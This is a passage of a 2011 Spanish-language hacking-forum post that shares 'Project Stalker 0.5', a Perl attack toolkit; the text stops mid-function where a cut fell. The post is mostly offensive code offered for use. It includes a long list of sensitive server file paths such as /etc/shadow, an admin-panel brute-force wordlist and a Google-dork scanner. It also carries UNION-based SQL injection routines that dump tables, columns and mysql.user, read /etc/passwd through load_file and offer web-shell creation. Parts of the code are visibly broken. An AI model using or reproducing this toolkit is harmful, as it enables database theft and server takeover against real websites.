elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Perl] Project Stalker 0.5
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] Project Stalker 0.5  (Leído 1,656 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Perl] Project Stalker 0.5
« en: 3 Diciembre 2011, 16:33 pm »

Lo mismo que la version anterior solo se le mejoro el cliente para vulnerabilidades SQLi

Código
  1. #!usr/bin/perl
  2. #Project STALKER 0.5
  3. #Coded By Doddy H
  4. #
  5. #ppm install http://www.bribes.org/perl/ppm/DBI.ppd
  6. #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
  7. #
  8.  
  9. use IO::Socket;
  10. use HTML::LinkExtor;
  11. use LWP::UserAgent;
  12. use Win32::OLE qw(in);
  13. use Win32::Process;
  14. use Net::FTP;
  15. use Cwd;
  16. use URI::Split qw(uri_split);
  17. use MIME::Base64;
  18. use DBI;
  19. use Color::Output;
  20. Color::Output::Init
  21.  
  22.  
  23. my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');
  24.  
  25. @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
  26. ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
  27. ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
  28. ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
  29. ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
  30. ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
  31. ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
  32. ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
  33. ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
  34. ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
  35. ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
  36. ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
  37. ,'administration/','administration/index.php','administration/login.php'
  38. ,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
  39. ,'system/login.php','admin.php','login.php','administrador.php','administration.php'
  40. ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
  41. ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
  42. ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
  43. ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
  44. ,'administrator/','administrator/index.html','administrator/login.html'
  45. ,'administrator/account.html','administrator/account.php','administrator.html','login.html'
  46. ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
  47. ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
  48. ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
  49. ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
  50. ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
  51. ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
  52. ,'administrator/login.asp','administrator/account.asp','administrator.asp'
  53. ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
  54. ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
  55. ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
  56. ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
  57. ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
  58. ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
  59. ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
  60. ,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
  61. ,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
  62. ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
  63. ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
  64. ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
  65. ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
  66. ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
  67. ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
  68. ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
  69. ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
  70. ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
  71. ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
  72. ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
  73. ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
  74. ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
  75. ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
  76. ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
  77. ,'server/','database_administration/','power_user/','system_administration/'
  78. ,'ss_vms_admin_sm/');
  79.  
  80.  
  81. unless (-d "/logs/webs") {
  82. mkdir("logs/",777);
  83. mkdir("logs/webs/",777);
  84. }
  85.  
  86. my $nave = LWP::UserAgent->new;
  87. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  88. $nave->timeout(5);
  89.  
  90. head();
  91.  
  92. getinfo();
  93.  
  94. $SIG{INT} = \&next;
  95.  
  96. while(1) {
  97. cprint "\x037"; #13
  98. menujo();
  99. cprint "\x030";
  100. }
  101.  
  102. sub getinfo {
  103. $so = $^O;
  104. $login = Win32::LoginName();
  105. $domain = Win32::DomainName();
  106. cprint "\x0313"; #13
  107. print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
  108. cprint "\x030";
  109. }
  110.  
  111.  
  112. sub menujo {
  113. print "\n\n>";
  114. chomp (my $cmd = <stdin>);
  115. print "\n\n";
  116.  
  117. if ($cmd=~/getinfo/ig) {
  118. getinfo();
  119. }
  120. if ($cmd =~/getip (.*)/) {
  121. my $te = $1;
  122. if ($te eq "" or $te eq " ") {
  123. print "\n[+] sintax : getip <host>\n";
  124. }
  125. print "\n[IP] : ".getip($1)."\n";
  126. print "\n";
  127. }
  128.  
  129. elsif ($cmd =~/getlink (.*)/) {
  130. print "[+] Extracting links in the page\n\n\n";
  131. $code = toma($1);
  132. my @re = get_links($code);
  133. for my $url(@re) {
  134. print "[Link] : $url\n";
  135. }
  136. print "\n\n[+] Finish\n";
  137. }
  138.  
  139. elsif ($cmd=~/help/) {
  140. helpme();
  141. }
  142.  
  143. elsif ($cmd=~/getprocess/) {
  144. my %re = getprocess();
  145.  
  146.  
  147. for my $data(keys %re) {
  148. ($proceso,$pid) = ($t=~/(.*):(.*)/ig);
  149. print "[+] Proceso : ".$data."\n";
  150. print "[+] PID : ".$re{$data}."\n\n";
  151. }
  152. }
  153. elsif ($cmd=~/killprocess (.*) (.*)/) {
  154. if (killprocess($1,$2)) {
  155. print "[+] Process $1 closed";
  156. }
  157. }
  158. elsif ($cmd=~/conec (.*) (.*) (.*)/) {
  159. print conectar($1,$2,$3);
  160. }
  161. elsif ($cmd=~/allow (.*)/) {
  162. $re = conectar($1,"80","GET / HTTP/1.0\r\n");
  163. if ($re=~/Allow:(.*)/ig) {
  164. print "[+] Metodos : ".$1."\n";
  165. }}
  166. elsif ($cmd=~/paths (.*)/) {
  167. scanpaths($1);
  168. }
  169. elsif ($cmd=~/encodehex (.*)/) {
  170. print "\n\n[+] ".hex_en($1)."\n\n";
  171. }
  172. elsif ($cmd=~/decodehex (.*)/) {
  173. print "\n\n[+] ".hex_de($1)."\n\n";
  174. }
  175. elsif ($cmd=~/download (.*) (.*)/) {
  176. my $file,$name = $1,$2;
  177. if (download($1,$2)) {
  178. print "[+] File downloaded\n";
  179. }
  180. }
  181. elsif ($cmd=~/encodeascii (.*)/) {
  182. print "\n\n[+] ".ascii($1)."\n\n";
  183. }
  184. elsif ($cmd=~/decodeascii (.*)/) {
  185. print "\n\n[+] ".ascii_de($1)."\n\n";
  186. }
  187. elsif ($cmd=~/encodebase (.*)/) {
  188. print "\n\n[+] ".base($1)."\n\n";
  189. }
  190. elsif ($cmd=~/decodebase (.*)/) {
  191. print "\n\n[+] ".base_de($1)."\n\n";
  192. }
  193. elsif ($cmd=~/aboutme/) {
  194. aboutme();
  195. }
  196. elsif ($cmd=~/scanport (.*)/) {
  197. scanport($1);
  198. }
  199. elsif ($cmd=~/panel (.*)/) {
  200. scanpanel($1);
  201. }
  202. elsif ($cmd=~/scangoogle/) {
  203. print "[Dork] : ";
  204. chomp(my $dork = <stdin>);
  205. print "\n\n[Pages] : ";
  206. chomp(my $pages = <stdin>);
  207. print "\n\n[Starting the search]\n\n";
  208. my @links = google($dork,$pages);
  209. print "\n[Links Found] : ".int(@links)."\n\n\n";
  210. print "[Starting the scan]\n\n\n";
  211. for my $link(@links) {
  212. if ($link=~/(.*)=/ig) {
  213. my $web = $1;
  214. sql($web."=");
  215. }}
  216. print "\n\n[+] Finish\n";
  217. }
  218. elsif ($cmd=~/getpass (.*)/) {
  219. crackit($1);
  220. }
  221. elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
  222. ftp($1,$2,$3);
  223. }
  224. elsif ($cmd=~/navegator/) {
  225. nave:
  226. print getcwd().">";
  227. chomp(my $rta = <stdin>);
  228. print "\n\n";
  229. if ($rta=~/list/) {
  230. my @files = coleccionar(getcwd());
  231. for(@files) {
  232. if (-f $_) {
  233. print "[File] : ".$_."\n";
  234. } else {
  235. print "[Directory] : ".$_."\n";
  236. }}}
  237. if ($rta=~/cd (.*)/) {
  238. my $dir = $1;
  239. if (chdir($dir)) {
  240. print "\n[+] Directory changed\n";
  241. } else {
  242. print "\n[-] Error\n";
  243. }}
  244. if ($rta=~/del (.*)/) {
  245. my $file = getcwd()."/".$1;
  246. if (-f $file) {
  247. if (unlink($file)) {
  248. print "\n[+] File Deleted\n";
  249. } else {
  250. print "\n[-] Error\n";
  251. }
  252. } else {
  253. if (rmdir($file)) {
  254. print "\n[+] Directory Deleted\n";
  255. } else {
  256. print "\n[-] Error\n";
  257. }}}
  258. if ($rta=~/rename (.*) (.*)/) {
  259. if (rename(getcwd()."/".$1,getcwd()."/".$2)) {
  260. print "\n[+] File Changed\n";
  261. } else {
  262. print "\n[-] Error\n";
  263. }}
  264. if ($rta=~/open (.*)/) {
  265. my $file = $1;
  266. chomp $file;
  267. system($file);
  268. #system(getcwd()."/".$file);
  269. }
  270. if ($rta=~/help/) {
  271. print "\nCommands : help cd list del rename open exit\n\n";
  272. }
  273. if ($rta=~/exit/) {
  274. next;
  275. }
  276. print "\n\n";
  277. goto nave;
  278. }
  279. elsif ($cmd=~/kobra (.*)/) {
  280. my $url = $1;
  281. chomp $url;
  282. scansqli($url,"--");
  283. }
  284. elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
  285. enter($1,$2,$3);
  286. }
  287. elsif ($cmd=~/exit/) {
  288. copyright();
  289. <stdin>;
  290. exit(1);
  291. }
  292. else {
  293. system($cmd);
  294. }
  295. #print "\n\n";
  296. }
  297.  
  298.  
  299. sub scansqli {
  300.  
  301. my $page = $_[0];
  302. print "[Status] : Scanning.....\n";
  303. ($pass1,$bypass2) = &bypass($_[1]);
  304. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  305. my $save = $auth;
  306.  
  307. if ($_[0]=~/hackman/ig) {
  308. savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
  309. &menu_options($_[0],$pass,$save);
  310. } else {
  311.  
  312. my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
  313. my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
  314.  
  315. unless ($testar1 eq $testar2) {
  316. motor($page,$_[1]);
  317. } else {
  318. print "\n[-] Not vulnerable\n\n";
  319. print "[+] Scan anyway y/n : ";
  320. chomp(my $op = <stdin>);
  321. if ($op eq "y") {
  322. motor($page,$_[1]);
  323. } else {
  324. #head();
  325. #menu();
  326. }}}}
  327.  
  328. sub motor {
  329.  
  330. my ($gen,$save,$control) = &length($_[0],$_[1]);
  331.  
  332. if ($control eq 1) {
  333. print "[Status] : Enjoy the menu\n\n";
  334. &menu_options($gen,$pass,$save);
  335. } else {
  336. print "[Status] : Length columns not found\n\n";
  337. }
  338. }
  339.  
  340. sub length {
  341. print "\n[+] Looking for the number of columns\n\n";
  342. my $rows  = "0";
  343. my $asc;
  344. my $page = $_[0];
  345. ($pass1,$pass2) = &bypass($_[1]);
  346.  
  347. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  348. $total = "1";
  349. for my $rows(2..200) {
  350. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
  351. $total.= ",".$rows;
  352. $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  353. $test = toma($injection);
  354. if ($test=~/RATSXPDOWN/) {
  355. @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
  356. $control = 1;
  357. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  358. my $save = $auth;
  359. savefile($save.".txt","\n[Target confirmed] : $page");
  360. savefile($save.".txt","[Bypass] : $_[1]\n");
  361. savefile($save.".txt","[Limit] : The site has $rows columns");
  362. savefile($save.".txt","[Data] : The number @number print data");
  363. $total=~s/$number[0]/hackman/;
  364. savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
  365. return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  366. }
  367. }
  368. }
  369.  
  370. sub details {
  371. my ($page,$bypass,$save) = @_;
  372. ($pass1,$pass2) = &bypass($bypass);
  373. savefile($save.".txt","\n");
  374. if ($page=~/(.*)hackman(.*)/ig) {
  375. print "\n[+] Searching information..\n\n";
  376. my  ($start,$end) = ($1,$2);
  377. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  378. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
  379. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  380. $test1 = toma($inforschema);
  381. $test2 = toma($mysqluser);
  382. if ($test2=~/ERTOR854/ig) {
  383. savefile($save.".txt","[mysql.user] : ON");
  384. print "[mysql.user] : ON\n";
  385. } else {
  386. print "[mysql.user] : OFF\n";
  387. savefile($save.".txt","[mysql.user] : OFF");
  388. }
  389. if ($test1=~/ERTOR854/ig) {
  390. print "[information_schema.tables] : ON\n";
  391. savefile($save.".txt","[information_schema.tables] : ON");
  392. } else {
  393. print "[information_schema.tables] : OFF\n";
  394. savefile($save.".txt","[information_schema.tables] : OFF");
  395. }
  396. if ($test3=~/ERTOR854/ig) {
  397. print "[load_file] : ON\n";
  398. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  399. }
  400. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  401. $injection = $start.$concat.$end.$pass2;
  402. $code = toma($injection);
  403. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  404. print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
  405. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
  406. } else {
  407. print "\n[-] Not found any data\n";
  408. }
  409. }
  410. }
  411.  
  412.  
  413. sub menu_options {
  414.  
  415. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  416. my $save = $auth;
  417. print "\n/logs/webs/$save>";
  418. chomp (my $rta = <stdin>);
  419.  
  420. if ($rta=~/help/) {
  421.  
  422. commands : details tables columns dbs othertable othercolumn
  423.           mysqluser dumper createshell readfile logs exit
  424.  
  425. );
  426. }
  427.  
  428.  
  429. if ($rta =~/tables/) {
  430. schematables($_[0],$_[1],$save);
  431. &reload;
  432. }
  433. elsif ($rta =~/columns (.*)/) {
  434. my $tabla = $1;
  435. schemacolumns($_[0],$_[1],$save,$tabla);
  436. &reload;
  437. }
  438. elsif ($rta =~/dbs/) {
  439. &schemadb($_[0],$_[1],$save);
  440. &reload;
  441. }
  442. elsif ($rta =~/othertable (.*)/) {
  443. my $data = $1;
  444. &schematablesdb($_[0],$_[1],$data,$save);
  445. &reload;
  446. }
  447. elsif ($rta =~/othercolumn (.*) (.*)/){
  448. my ($db,$table) = ($1,$2);
  449. &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
  450. &reload;
  451. }
  452. elsif ($rta =~/mysqluser/) {
  453. &mysqluser($_[0],$_[1],$save);
  454. &reload;
  455. }
  456. elsif ($rta=~/logs/) {
  457. $t = "logs/webs/$save.txt";
  458. system("start $t");
  459. &reload;
  460. }
  461. elsif ($rta=~/exit/) {
  462. next;
  463. }
  464.  
  465. elsif($rta=~/createshell/) {
  466. print "\n\n[Full Path Discloure] : ";
  467. chomp(my $path = <STDIN>);
  468. &into($_[0],$_[1],$path,$save);
  469. }
  470. elsif($rta=~/readfile/) {
  471. loadfile($_[0],$_[1],$save);
  472. }
  473. elsif ($rta=~/dumper (.*) (.*) (.*)/) {
  474. my ($tabla,$col1,$col2) = ($1,$2,$3);
  475. &dump($_[0],$col1,$col2,$tabla,$_[1],$save);
  476. &reload;
  477. }
  478. elsif ($rta =~/details/) {
  479. &details($_[0],$_[1],$save);
  480. &reload;
  481. }
  482. else {
  483. &reload;
  484. }
  485. }
  486.  
  487.  
  488.  
  489. sub schematables {
  490. $real = "1";
  491. my ($page,$bypass,$save) = @_;
  492. savefile($save.".txt","\n");
  493. print "\n";
  494. my $page1 = $page;
  495. ($pass1,$pass2) = &bypass($_[1]);
  496. savefile($save.".txt","[DB] : default");
  497. print "\n[+] Searching tables with schema\n\n";
  498. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  499. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  500. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
  501. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  502. my $resto = $1;
  503. $total = $resto - 17;
  504. print "[+] Tables Length :  $total\n\n";
  505. savefile($save.".txt","[+] Searching tables with schema\n");
  506. savefile($save.".txt","[+] Tables Length :  $total\n");
  507. my $limit = $1;
  508. for my $limit(17..$limit) {
  509. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
  510. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  511. my $table = $1;
  512. chomp $table;
  513. print "[Table $real Found : $table ]\n";
  514. savefile($save.".txt","[Table $real Found : $table ]");
  515. $real++;
  516. }}
  517. print "\n";
  518. } else {
  519. print "\n[-] information_schema = ERROR\n";
  520. }
  521. }
  522.  
  523. sub reload {
  524. &menu_options($_[0]);
  525. }
  526.  
  527.  
  528. sub schemacolumns {
  529. my ($page,$bypass,$save,$table) = @_;
  530. my $page3 = $page;
  531. my $page4 = $page;
  532. savefile($save.".txt","\n");
  533. print "\n";
  534. ($pass1,$pass2) = &bypass($bypass);
  535. print "\n[DB] : default\n";
  536. savefile($save.".txt","[DB] : default");
  537. savefile($save.".txt","[Table] : $table\n");
  538. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  539. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
  540. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  541. print "\n[Columns Length : $1 ]\n\n";
  542. savefile($save.".txt","[Columns Length : $1 ]\n");
  543. my $si = $1;
  544. chomp $si;
  545. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  546. $real = "1";
  547. for my $limit2(0..$si) {
  548. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  549. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  550. print "[Column $real] : $1\n";
  551. savefile($save.".txt","[Column $real] : $1");
